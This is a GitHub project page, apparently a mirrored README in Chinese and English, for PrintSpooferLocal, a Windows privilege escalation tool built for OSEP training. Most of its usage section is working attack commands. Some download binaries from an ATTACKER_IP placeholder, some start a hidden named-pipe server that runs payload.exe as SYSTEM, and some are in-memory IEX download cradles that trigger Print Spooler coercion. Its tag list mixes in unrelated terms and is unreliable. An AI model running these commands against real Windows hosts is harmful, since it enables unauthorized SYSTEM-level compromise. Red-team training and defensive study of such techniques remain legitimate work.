totekuh/sharp-printspoofer
GitHub: totekuh/sharp-printspoofer
基于 Print Spooler 强制调用和命名管道模拟的 Windows 本地提权工具,将 SeImpersonatePrivilege 提升至 SYSTEM 权限。
Stars: 0 | Forks: 0
# PrintSpooferLocal
通过命名管道模拟 + Print Spooler 强制调用的本地权限提升。强制 SYSTEM 连接到受控命名管道,模拟令牌,并以 NT AUTHORITY\SYSTEM 权限启动进程。
在 OSEP 期间构建。
## 构建
需要 `mono-mcs` 和 `python3`(Kali 默认已包含二者)。
```
make # build everything
make assembly # .NET assembly only
make loader # PS1 reflective loader only
make clean # nuke dist/
```
生成文件位于 `dist/`。
## 使用方法
两个组件协同工作:
| 组件 | 角色 |
|---|---|
| `PrintSpooferLocal.exe` | 命名管道服务器 —— 模拟连接的 SYSTEM 令牌并生成进程 |
| `Invoke-SpoolSample.ps1` | 触发器 —— 通过 MS-RPRN 强制 Print Spooler (SYSTEM) 连接到管道 |
### 落地(基于磁盘)
#### 1. 上传二进制文件
```
iwr http://ATTACKER_IP/PrintSpooferLocal.exe -outfile C:\Windows\temp\PrintSpooferLocal.exe
iwr http://ATTACKER_IP/SpoolSample.exe -outfile C:\Windows\temp\SpoolSample.exe
```
#### 2. 启动命名管道服务器
```
Start-Process "C:\windows\temp\PrintSpooferLocal.exe" `
-ArgumentList '--pipe','\\.\pipe\pwn\pipe\spoolss','--cmd','C:\Windows\temp\payload.exe' `
-WindowStyle Hidden
```
验证其是否正在运行:
```
Get-Process -name printspooferlocal
```
#### 3. 触发后台打印程序强制调用
```
$h = hostname
Start-Process "C:\windows\temp\SpoolSample.exe" `
-ArgumentList $h,"$h/pipe/pwn" `
-WindowStyle Hidden
```
Print Spooler (SYSTEM) 连接到管道。PrintSpooferLocal 模拟令牌并以 SYSTEM 权限执行命令。
### 反射式(内存中)
```
# Load both cradles
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-PrintSpooferLocal.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-SpoolSample.ps1')
# Start the pipe server
Invoke-PrintSpooferLocal "--pipe \\.\pipe\pwn\pipe\spoolss --cmd C:\Windows\temp\payload.exe"
# Trigger coercion
Invoke-SpoolSample -Target $env:COMPUTERNAME -CaptureServer "$env:COMPUTERNAME/pipe/pwn"
```
## 选项
```
--pipe Named pipe path (e.g., \\.\pipe\pwn\pipe\spoolss)
--cmd Command to run as SYSTEM
-h, --help Help
```
## 项目结构
```
src/ C# sources + C trigger source
scripts/ build helpers (PS1 loader generator)
vendor/ pre-built loaders (Invoke-SpoolSample.ps1)
dist/ build artifacts (gitignored)
Makefile build system
```
标签:AI合规, CSharp, CTF学习, MS-RPRN, Named Pipe, OSEP, PE 加载器, PrintSpoofer, Print Spooler, SeImpersonatePrivilege, SpoolSample, SYSTEM权限, Web报告查看器, 代码生成, 令牌模拟, 内网渗透, 协议分析, 协议欺骗, 多人体追踪, 数据展示, 本地提权, 本地漏洞利用, 权限提升, 横向移动, 渗透测试工具, 红队, 编程规范, 逆向工具